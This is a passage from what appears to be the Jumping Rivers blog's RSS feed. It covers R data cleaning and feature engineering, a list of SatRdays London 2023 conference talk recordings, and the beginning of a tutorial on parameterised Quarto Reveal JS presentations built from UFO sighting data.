&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 4 4 Fred 23 Male 77 0 4.80 3.35&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;We use the &lt;code&gt;initial_split()&lt;/code&gt; function to split the data_encoded
dataframe into training and testing sets. The &lt;code&gt;prop&lt;/code&gt; specifies the
proportion of data to allocate for the training set. In this case, we’ve
gone for a 50:50 split. The &lt;code&gt;training()&lt;/code&gt; and &lt;code&gt;testing()&lt;/code&gt; functions are
then used to extract the training and testing data sets.&lt;/p&gt;
&lt;h3 id="advanced-data-cleaning-and-processing-techniques"&gt;Advanced Data Cleaning and Processing Techniques&lt;/h3&gt;
&lt;p&gt;Data cleaning and preprocessing have evolved beyond the traditional
methods. Advanced techniques such as Time-Series Imputation and Deep
Learning-Based Outlier Detection can handle complex scenarios and yield
more accurate results:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Time-Series Imputation:&lt;/strong&gt; Missing values can disrupt patterns.
Techniques like forward-fill, backward-fill, or using the last
observation carried forward can be effective.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Deep Learning-Based Outlier Detection:&lt;/strong&gt; Autoencoders can identify
subtle outliers in high-dimensional data.&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;h3 id="deeper-dive-into-feature-engineering"&gt;Deeper Dive into Feature Engineering:&lt;/h3&gt;
&lt;p&gt;Feature engineering goes beyond data cleaning — it’s about creating new
attributes to improve model performance, for example:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Polynomial Features:&lt;/strong&gt; Transforming features into higher-degree
polynomials can capture non-linear relationships.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Interaction Features:&lt;/strong&gt; Multiplying or combining features can reveal
interactions between them.&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Advanced data cleaning steps involve more specialised techniques that
can help you handle complex scenarios. Here are some references and
resources that provide in-depth information on advanced data cleaning
techniques:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;
&lt;p&gt;&lt;a href="https://www.oreilly.com/library/view/hands-on-exploratory-data/9781789804379/" rel="external"&gt;“Hands-On Exploratory Data Analysis with R” by Radhika Datar and
Harish
Garg&lt;/a&gt;.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;a href="https://www.google.com/books/edition/Feature_Engineering_and_Selection/xy73DwAAQBAJ" rel="external"&gt;“Feature Engineering and Selection: A Practical Approach for
Predictive Models” by Max Kuhn and Kjell
Johnson&lt;/a&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;a href="https://www.google.com/books/edition/Feature_Engineering_for_Machine_Learning/sthSDwAAQBAJ" rel="external"&gt;“Feature Engineering for Machine Learning: Principles and Techniques
for Data Scientists” by Alice Zheng and Amanda
Casari&lt;/a&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;h3 id="automation-and-tools"&gt;Automation and Tools:&lt;/h3&gt;
&lt;p&gt;For R users, the journey of data cleaning and preprocessing becomes even
more seamless due to powerful libraries and tools tailored to your
needs. The {tidyverse} suite of packages offers {dplyr} for efficient
data manipulation, {tidyr} for tidying up messy datasets, and
&lt;a href="https://stringr.tidyverse.org/" rel="external"&gt;{stringr}&lt;/a&gt; for handling text data,
among others. Whether it’s imputing missing values, encoding categorical
variables, or standardising features, R’s automation libraries such as
{tidyverse} empower you to focus on extracting insights rather than
getting caught up in manual data cleaning tasks. With these tools by
your side, you can navigate the data preprocessing landscape with
confidence and efficiency.&lt;/p&gt;
&lt;p&gt;In conclusion, data cleaning and preprocessing are essential steps that
pave the way for accurate analysis and reliable insights. By following
the best practices outlined in this blog post, you can ensure that your
data is well-prepared for modeling and analysis.&lt;/p&gt;
&lt;p&gt;By addressing missing values, outliers, and inconsistencies, you’re
laying a strong foundation for impactful data-driven decision-making. As
you delve into more advanced techniques, explore feature engineering,
and embrace automation, you’ll unlock even more potential from your
data. So, whether you’re a data scientist, researcher, or business
professional, embracing these practices will undoubtedly contribute to
the success of your data-driven endeavours.&lt;/p&gt;
&lt;p&gt;Remember that the effort invested in cleaning and preprocessing data is
an investment in the quality of your results.&lt;/p&gt;
&lt;p&gt;Happy data cleaning and preprocessing!&lt;/p&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/best-practices-data-cleaning-r/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>SatRdays London 2023 - Recordings</title><link>https://www.jumpingrivers.com/blog/satrdays-london-2023-r-conference-recordings/</link><pubDate>Thu, 27 Jul 2023 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/satrdays-london-2023-r-conference-recordings/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/satrdays-london-2023-r-conference-recordings/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/satrdays-london-2023-r-conference-recordings/featured.png " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;The recordings from this year&amp;rsquo;s SatRdays London conference are here! Over the next couple of weeks, we will be releasing the recordings of some of the excellent talks from the conference!&lt;/p&gt;
&lt;p&gt;You&amp;rsquo;ll be able to find them all in &lt;a href="https://www.youtube.com/playlist?list=PLbARZQfpqIKLNjt5NnVQ1RgEKeayVVv6G" rel="external"&gt;this playlist&lt;/a&gt; as they&amp;rsquo;re released, and keep an eye on our Twitter feed to see them as they come out.&lt;/p&gt;
&lt;p&gt;
&lt;aside class="advert"&gt;
&lt;p&gt;
Data comes in all shapes and sizes. It can often be difficult to know where to start. Whatever your problem, &lt;a href="https://www.jumpingrivers.com/consultancy/data-science-machine-learning/?utm_source=blog&amp;amp;utm_medium=banner&amp;amp;utm_campaign=2023-satrdays-london-2023-r-conference-recordings"&gt;Jumping Rivers can help&lt;/a&gt;.
&lt;/p&gt;
&lt;/aside&gt;
&lt;!-- This is where the ad goes! Just use the name of the shortcode file. --&gt;&lt;/p&gt;
&lt;p&gt;As a quick reminder, here&amp;rsquo;s a list of talks from the event:&lt;/p&gt;
&lt;h3 id="speakers"&gt;Speakers&lt;/h3&gt;
&lt;h4 id="keynote-speakers"&gt;Keynote Speakers&lt;/h4&gt;
&lt;ul&gt;
&lt;li&gt;Julia Silge (&lt;a href="https://posit.co/" rel="external"&gt;Posit&lt;/a&gt;): &lt;em&gt;What is &amp;ldquo;production&amp;rdquo; anyway? MLOps for the curious&lt;/em&gt;&lt;/li&gt;
&lt;li&gt;Oliver Hawkins (&lt;a href="https://www.ft.com/" rel="external"&gt;Financial Times&lt;/a&gt;): &lt;em&gt;Why R is good for journalism&lt;/em&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h4 id="contributed-talks"&gt;Contributed Talks&lt;/h4&gt;
&lt;ul&gt;
&lt;li&gt;Botan Ağın &amp;amp; Michael Stevens (&lt;a href="https://samknows.com/" rel="external"&gt;SamKnows&lt;/a&gt;): &lt;em&gt;AutRmatic reporting: billions of internet measurements, hundreds of reports and one repository to rule them all&lt;/em&gt;&lt;/li&gt;
&lt;li&gt;Vyara Apostolova &amp;amp; Laura Cole (&lt;a href="https://www.nao.org.uk/" rel="external"&gt;National Audit Office&lt;/a&gt;): &lt;em&gt;ScRutinising government spending&lt;/em&gt; (not recorded)&lt;/li&gt;
&lt;li&gt;Andrew Collier (&lt;a href="https://www.fathomdata.dev/" rel="external"&gt;Fathom Data&lt;/a&gt;): &lt;em&gt;Sidekicks of the Tidyverse&lt;/em&gt;&lt;/li&gt;
&lt;li&gt;Jack Davison (&lt;a href="https://www.ricardo.com/en/services/environmental-consulting" rel="external"&gt;Ricardo Energy &amp;amp; Environment&lt;/a&gt;): &lt;em&gt;“Put it on a map!” – Developments in Air Quality Data Analysis&lt;/em&gt;&lt;/li&gt;
&lt;li&gt;Russ Hyde (&lt;a href="https://www.jumpingrivers.com/" rel="external"&gt;Jumping Rivers&lt;/a&gt;): &lt;em&gt;Does code quality even matter in data science?&lt;/em&gt;&lt;/li&gt;
&lt;li&gt;Ella Kaye &amp;amp; Heather Turner (&lt;a href="https://warwick.ac.uk/" rel="external"&gt;University of Warwick&lt;/a&gt;): &lt;em&gt;Sustainability and EDI (Equality, Diversity and Inclusion) in the R Project&lt;/em&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h3 id="sponsors"&gt;Sponsors&lt;/h3&gt;
&lt;p&gt;Huge thanks again to all of the event sponsors, in particular CUSP London, who provided the venue and AV support, which allowed us to share these with you.&lt;/p&gt;
&lt;img src="cusp-london-logo.png" alt="CUSP London logo" style="width: 400px; display: block; margin-left: auto; margin-right: auto; margin-top: 50px"/&gt;
&lt;img src="jr-logo-dark.png" alt="Jumping Rivers logo" style="width: 400px; display: block; margin-left: auto; margin-right: auto; margin-top: 50px"/&gt;
&lt;img src="posit-logo.png" alt="Posit logo" style="width: 400px; display: block; margin-left: auto; margin-right: auto; margin-top: 50px"/&gt;
&lt;img src="r-consortium-logo.png" alt="R Consortium logo" style="width: 400px; display: block; margin-left: auto; margin-right: auto; margin-top: 50px"/&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/satrdays-london-2023-r-conference-recordings/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>Generate multiple presentations with Quarto parameters</title><link>https://www.jumpingrivers.com/blog/r-parameterised-presentations-quarto/</link><pubDate>Thu, 20 Jul 2023 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/r-parameterised-presentations-quarto/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/r-parameterised-presentations-quarto/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/r-parameterised-presentations-quarto/featured.png " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;Parameterised reporting is a powerful technique that allows you to
create dynamic and customisable reports by incorporating user-defined
parameters. These parameters act as placeholders that can be easily
modified to generate tailored reports based on specific inputs or
conditions, enabling seamless updates to reports without the need for
manual modifications. &lt;a href="https://quarto.org/" rel="external"&gt;Quarto&lt;/a&gt;, a modern and
flexible document generation tool, provides excellent support for
parameterised reporting.&lt;/p&gt;
&lt;p&gt;In this blog, we will be looking at a Quarto &lt;a href="https://quarto.org/docs/presentations/revealjs/" rel="external"&gt;Reveal
JS&lt;/a&gt; presentation as an
example. By defining parameters within a Quarto presentation, you can
easily add flexibility and interactivity to your presentations, allowing
you to tailor the content to the specific needs or preferences of your
audience.&lt;/p&gt;
&lt;aside class="advert"&gt;
&lt;p&gt;
Data comes in all shapes and sizes. It can often be difficult to know where to start. Whatever your problem, &lt;a href="https://www.jumpingrivers.com/consultancy/data-science-machine-learning/?utm_source=blog&amp;amp;utm_medium=banner&amp;amp;utm_campaign=2023-r-parameterised-presentations-quarto"&gt;Jumping Rivers can help&lt;/a&gt;.
&lt;/p&gt;
&lt;/aside&gt;
&lt;h3 id="creating-a-reveal-js-presentation"&gt;Creating a Reveal JS presentation&lt;/h3&gt;
&lt;p&gt;You can easily create a Reveal JS presentation in RStudio with
&lt;code&gt;File &amp;gt; New File &amp;gt; Quarto Presentation &amp;gt; Reveal JS&lt;/code&gt;. This will create a
Quarto file (let’s call it &lt;code&gt;slides.qmd&lt;/code&gt;) as usual. We are going to be
using a slightly modified version of the
&lt;a href="https://github.com/rfordatascience/tidytuesday/tree/master" rel="external"&gt;TidyTuesday&lt;/a&gt;
data set on &lt;a href="https://github.com/rfordatascience/tidytuesday/blob/master/data/2023/2023-06-20/readme.md" rel="external"&gt;UFO
sightings&lt;/a&gt;.
The CSV file for the data set is available on our
&lt;a href="https://github.com/jumpingrivers/blog/tree/main/blogs/2023-r-parameterised-presentations-quarto" rel="external"&gt;GitHub&lt;/a&gt;.
In this data set, we have information on UFO sightings between 2019 and
2022 from different US states.&lt;/p&gt;
&lt;p&gt;We will update the YAML for our presentation to add a title as well as
update the theme to make it look a little bit nicer.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-yaml" data-lang="yaml"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;---&lt;/span&gt;&lt;span style="color:#6e7681"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#6e7681"&gt;&lt;/span&gt;&lt;span style="color:#7ee787"&gt;title&lt;/span&gt;:&lt;span style="color:#6e7681"&gt; &lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;UFO Sightings&amp;#34;&lt;/span&gt;&lt;span style="color:#6e7681"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#6e7681"&gt;&lt;/span&gt;&lt;span style="color:#7ee787"&gt;format&lt;/span&gt;:&lt;span style="color:#6e7681"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#6e7681"&gt; &lt;/span&gt;&lt;span style="color:#7ee787"&gt;revealjs&lt;/span&gt;:&lt;span style="color:#6e7681"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#6e7681"&gt; &lt;/span&gt;&lt;span style="color:#7ee787"&gt;theme&lt;/span&gt;:&lt;span style="color:#6e7681"&gt; &lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;simple&lt;/span&gt;&lt;span style="color:#6e7681"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#6e7681"&gt;&lt;/span&gt;&lt;span style="color:#ff7b72"&gt;---&lt;/span&gt;&lt;span style="color:#6e7681"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;We’ll also add some general package-loading and data-reading code to the
top of our presentation.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;library&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;dplyr&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;library&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;ggplot2&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;ufo_sightings &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; readr&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;read_csv&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;ufo_sightings.csv&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Let’s say we wanted to include a histogram of UFO sighting durations in
our presentation. For Idaho in 2022, the code would look something like
this:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;ufo_subset &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; ufo_sightings &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; dplyr&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;filter&lt;/span&gt;(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; year &lt;span style="color:#ff7b72;font-weight:bold"&gt;==&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;2022&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; state_name &lt;span style="color:#ff7b72;font-weight:bold"&gt;==&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;Idaho&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; )
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;to create a subset of the full UFO sighting data set and then:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;ufo_subset &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;ggplot&lt;/span&gt;(&lt;span style="color:#d2a8ff;font-weight:bold"&gt;aes&lt;/span&gt;(x &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; duration_seconds)) &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;geom_histogram&lt;/span&gt;(fill &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;#c74a4a&amp;#34;&lt;/span&gt;) &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;labs&lt;/span&gt;(x &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;Duration (seconds)&amp;#34;&lt;/span&gt;, y &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;&amp;#34;&lt;/span&gt;) &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;scale_x_continuous&lt;/span&gt;(labels &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; scales&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;comma_format&lt;/span&gt;()) &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;theme_minimal&lt;/span&gt;()
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;to create the histogram itself. We can then add this to a slide of our
presentation and add the heading “Sighting duration”.&lt;/p&gt;
&lt;p&gt;&lt;img alt="Bar chart of duration of sightings in seconds." height="auto" id="h-rh-i-0" src="https://www.jumpingrivers.com/blog/r-parameterised-presentations-quarto/sighting-duration.png" width="1517"&gt;
Now, what if we wanted to create this plot but for another state-year
combination. This is where we need parameters.&lt;/p&gt;
&lt;h3 id="using-parameters-in-quarto"&gt;Using parameters in Quarto&lt;/h3&gt;
&lt;p&gt;To add parameters to your Quarto document or presentation, you need to
use the &lt;code&gt;params&lt;/code&gt; option in the YAML. We want to be able to generate our
report flexibly with different combinations of US state and year, so we
will create a parameter for each of them. We will use Idaho and 2022 as
the default values for these parameters.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-yaml" data-lang="yaml"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;---&lt;/span&gt;&lt;span style="color:#6e7681"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#6e7681"&gt;&lt;/span&gt;&lt;span style="color:#7ee787"&gt;title&lt;/span&gt;:&lt;span style="color:#6e7681"&gt; &lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;UFO Sightings&amp;#34;&lt;/span&gt;&lt;span style="color:#6e7681"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#6e7681"&gt;&lt;/span&gt;&lt;span style="color:#7ee787"&gt;format&lt;/span&gt;:&lt;span style="color:#6e7681"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#6e7681"&gt; &lt;/span&gt;&lt;span style="color:#7ee787"&gt;revealjs&lt;/span&gt;:&lt;span style="color:#6e7681"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#6e7681"&gt; &lt;/span&gt;&lt;span style="color:#7ee787"&gt;theme&lt;/span&gt;:&lt;span style="color:#6e7681"&gt; &lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;simple&lt;/span&gt;&lt;span style="color:#6e7681"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#6e7681"&gt;&lt;/span&gt;&lt;span style="color:#7ee787"&gt;params&lt;/span&gt;:&lt;span style="color:#6e7681"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#6e7681"&gt; &lt;/span&gt;&lt;span style="color:#7ee787"&gt;state&lt;/span&gt;:&lt;span style="color:#6e7681"&gt; &lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;Idaho&amp;#34;&lt;/span&gt;&lt;span style="color:#6e7681"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#6e7681"&gt; &lt;/span&gt;&lt;span style="color:#7ee787"&gt;year&lt;/span&gt;:&lt;span style="color:#6e7681"&gt; &lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;2022&lt;/span&gt;&lt;span style="color:#6e7681"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#6e7681"&gt;&lt;/span&gt;&lt;span style="color:#ff7b72"&gt;---&lt;/span&gt;&lt;span style="color:#6e7681"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;These parameters are then stored in the &lt;code&gt;params&lt;/code&gt; list accessible from
within your presentation. So we can now update our code from before to
instead rely on &lt;code&gt;params$year&lt;/code&gt; and &lt;code&gt;params$state&lt;/code&gt; instead of the
hard-coded year and state.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;ufo_subset &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; ufo_sightings &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; dplyr&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;filter&lt;/span&gt;(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; year &lt;span style="color:#ff7b72;font-weight:bold"&gt;==&lt;/span&gt; params&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;year,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; state_name &lt;span style="color:#ff7b72;font-weight:bold"&gt;==&lt;/span&gt; params&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;state
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; )
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Now, our plot will automatically update each time we re-generate the
presentation with different parameters.&lt;/p&gt;
&lt;p&gt;Before we go through how to actually generate the presentation with
different values than the defaults, let’s first also add a &lt;code&gt;subtitle&lt;/code&gt; to
the presentation which will change as the parameters change. So,
something like:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-yaml" data-lang="yaml"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;---&lt;/span&gt;&lt;span style="color:#6e7681"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#6e7681"&gt;&lt;/span&gt;&lt;span style="color:#7ee787"&gt;title&lt;/span&gt;:&lt;span style="color:#6e7681"&gt; &lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;UFO Sightings&amp;#34;&lt;/span&gt;&lt;span style="color:#6e7681"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#6e7681"&gt;&lt;/span&gt;&lt;span style="color:#7ee787"&gt;subtitle&lt;/span&gt;:&lt;span style="color:#6e7681"&gt; &lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;`r params$state`, `r params$year`&amp;#34;&lt;/span&gt;&lt;span style="color:#6e7681"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#6e7681"&gt;&lt;/span&gt;&lt;span style="color:#7ee787"&gt;format&lt;/span&gt;:&lt;span style="color:#6e7681"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#6e7681"&gt; &lt;/span&gt;&lt;span style="color:#7ee787"&gt;revealjs&lt;/span&gt;:&lt;span style="color:#6e7681"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#6e7681"&gt; &lt;/span&gt;&lt;span style="color:#7ee787"&gt;theme&lt;/span&gt;:&lt;span style="color:#6e7681"&gt; &lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;simple&lt;/span&gt;&lt;span style="color:#6e7681"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#6e7681"&gt;&lt;/span&gt;&lt;span style="color:#7ee787"&gt;params&lt;/span&gt;:&lt;span style="color:#6e7681"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#6e7681"&gt; &lt;/span&gt;&lt;span style="color:#7ee787"&gt;state&lt;/span&gt;:&lt;span style="color:#6e7681"&gt; &lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;Idaho&amp;#34;&lt;/span&gt;&lt;span style="color:#6e7681"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#6e7681"&gt; &lt;/span&gt;&lt;span style="color:#7ee787"&gt;year&lt;/span&gt;:&lt;span style="color:#6e7681"&gt; &lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;2022&lt;/span&gt;&lt;span style="color:#6e7681"&gt;
